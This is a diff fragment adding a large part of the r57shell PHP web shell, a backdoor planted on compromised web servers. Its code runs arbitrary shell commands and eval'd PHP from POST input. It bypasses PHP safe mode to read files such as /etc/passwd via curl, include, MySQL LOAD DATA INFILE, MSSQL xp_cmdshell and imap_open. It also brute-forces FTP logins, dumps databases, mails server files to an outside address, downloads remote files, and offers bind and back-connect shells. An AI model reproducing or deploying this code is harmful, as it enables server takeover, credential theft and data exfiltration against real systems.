+ if(!$connection) { fe($language,0); $_POST['cmd'] = ""; }
+ else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ @ftp_close($connection);
+ }
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+ $d=@dir($dir);
+ 
if ($d)
+ {
+ while (false!==($file=$d->read()))
+ {
+ if ($file=="." || $file=="..") continue;
+ @clearstatcache();
+ list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+ if($windows){
+ echo date("d.m.Y H:i",$mtime);
+ if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
+ }
+ else{
+ $owner = @posix_getpwuid($uid);
+ $grgid = @posix_getgrgid($gid);
+ echo $inode." ";
+ echo perms(@fileperms($file));
+ printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+ echo date("d.m.Y H:i ",$mtime);
+ }
+ echo "$file\n";
+ }
+ $d->close();
+ }
+ else echo $lang[$language._text29];
+ break;
+ case 'safe_file':
+ if(@is_file($_POST['file']))
+ {
+ $file = @file($_POST['file']);
+ if($file)
+ {
+ $c = @sizeof($file);
+ for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+ }
+ else echo $lang[$language._text29];
+ }
+ else echo $lang[$language._text31];
+ break;
+ case 'test1':
+ $ci = @curl_init("file://".$_POST['test1_file']."");
+ $cf = @curl_exec($ci);
+ echo $cf;
+ break;
+ case 'test2':
+ @include($_POST['test2_file']);
+ break;
+ case 'test3':
+ if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+ $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+ if($db)
+ {
+ if(@mysql_select_db($_POST['test3_md'],$db))
+ {
+ $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+ @mysql_query($sql);
+ $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+ @mysql_query($sql);
+ $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+ @mysql_query($sql);
+ $sql = "SELECT * FROM temp_r57_table;";
+ $r = @mysql_query($sql);
+ while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+ $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+ @mysql_query($sql);
+ }
+ else echo "[-] ERROR! 
Can't select database";
+ @mysql_close($db);
+ }
+ else echo "[-] ERROR! Can't connect to mysql server";
+ break;
+ case 'test4':
+ if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+ $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+ if($db)
+ {
+ if(@mssql_select_db($_POST['test4_md'],$db))
+ {
+ @mssql_query("drop table r57_temp_table",$db);
+ @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+ @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+ $res = mssql_query("select * from r57_temp_table",$db);
+ while(($row=@mssql_fetch_row($res)))
+ {
+ echo $row[0]."\r\n";
+ }
+ @mssql_query("drop table r57_temp_table",$db);
+ }
+ else echo "[-] ERROR! Can't select database";
+ @mssql_close($db);
+ }
+ else echo "[-] ERROR! Can't connect to MSSQL server";
+ break;
+ case 'test5':
+ if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
+ $extra = "-C ".$_POST['test5_file']." 
-X /tmp/mb_send_mail";
+ @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+ $lines = file ('/tmp/mb_send_mail');
+ foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
+ break;
+ case 'test6':
+ $stream = @imap_open('/etc/passwd', "", "");
+ $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+ for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
+ @imap_close($stream);
+ break;
+ case 'test7':
+ $stream = @imap_open($_POST['test7_file'], "", "");
+ $str = @imap_body($stream, 1);
+ echo $str;
+ @imap_close($stream);
+ break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ foreach($users as $user)
+ {
+ $connection = @ftp_connect($ftp_server,$ftp_port,10);
+ if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+ else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." 
- success\r\n"; $suc++; } }
+ @ftp_close($connection);
+ }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="mysql_dump")
+ {
+ if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+ $sql = new my_sql();
+ $sql->db = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];
+ $sql->base = $_POST['mysql_db'];
+ if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+ else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+ else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+ else {
+ if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+ else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
+ else { echo "[-] ERROR! 
Can't write in dump file"; }
+ }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function up_down($id)
+ {
+ global $lang;
+ global $language;
+ return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">';
+ }
+function div($id)
+ {
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts;
+echo 
sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts;
+echo 
sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font;
+echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts;
+echo 
sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts;
+echo 
sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$unix&&function_exists('mb_send_mail')){
+echo $fs.$table_up1.$lang[$language.'_text112'].up_down('id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_list')){
+echo $fs.$table_up1.$lang[$language.'_text113'].up_down('id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_body')){
+echo $fs.$table_up1.$lang[$language.'_text114'].up_down('id24').$table_up2.div('id24').$ts;
+echo 
sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' 
zip'; }
+if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+if(@function_exists("ftp_connect")){
+echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo 
sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($unix && @function_exists("ftp_connect")){
+echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts;
+echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo sr(15,"","<font face=Verdana size=2>".$lang[$language.'_text99']." 
( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@function_exists("mail")){
+echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo 
sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on) $select .= '<option>PostgreSQL</option>';
+if($ora_on) $select .= '<option>Oracle</option>';
+$select .= '</select>';
+echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' 
<b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' 
<b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
+}
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? 
(getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
